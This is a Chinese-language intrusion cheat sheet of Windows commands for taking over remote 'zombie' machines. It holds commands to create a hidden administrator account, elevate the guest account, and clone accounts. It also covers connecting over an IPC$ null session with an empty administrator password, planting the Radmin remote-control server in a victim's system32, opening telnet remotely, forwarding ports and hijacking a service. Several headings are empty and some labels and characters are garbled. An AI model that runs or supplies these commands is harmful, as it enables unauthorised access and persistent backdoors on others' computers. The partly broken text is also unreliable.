常用命令

計算機管理：command MMC

結束進程：NET SHARE

查看版本：ver

查看中端(服務）：net start

查看文件：dir

查看3389：

加用戶：c:\winnt\system32>net user adminserver$ admin /add

提權限：net localgroup administrators adminserver$ /add

查看用戶net user

遠程連接到主機CMD命令：telnet 主機IP

踢人：logoff ID

查看當前人：query user

打開telnet:net start telnet

telnet連接工具：OpenTelnet

啟用GUEST：net user guest /active:yes

提升到管理員：net localgroup "Administrators" guest /add

超級用戶隱藏器:c:\door adminserver$:admin

克隆賬號：ca \\IP 你建立的賬號 密碼 肉機默認賬號 密碼

ca \\127.0.0.1 adminserver$ admin adminserver admin

完全禁止系統(tǒng)模認工享

3389替換服務-----------------------

中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe

端口轉向：f:\web\ftp.exe "c:\fpipe.exe -v -l 開放的端口 -r 要轉向的端口 ip"

使用空口令連接:

net use \\對方IP\ipc$ "" /user:"administrator"

(在上傳文件的目錄下)遠程復制文件:

c: admin>net use \\a-01\ipc$ "12345" /user:administrator

c: amdin>copy r_server.exe \\a-01\admin$\system32

c: amdin>copy radmin.reg \\a-01\admin$\sytem32

在對方CMD下：

copy r_server.exe \\對方IP\admin$\system32

c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90

copy 文件名 \\IP\admin$\system32

進入對方CMD:

c:\opentelnet.exe \\Ip administrator "" 0 90

登陸CMD:

安裝RADMIN:

導入注冊表:

看端口:

改端口:

起動服務:

隱藏文件:

看看共享開了沒有,沒有的話把共享開開

清單是空的。

命令成功完成。

命令成功完成。

查看端口：netstat-n

SA傳送文件TFTP

先在本機開tftp服務 sqlexec

。。。。。。。參考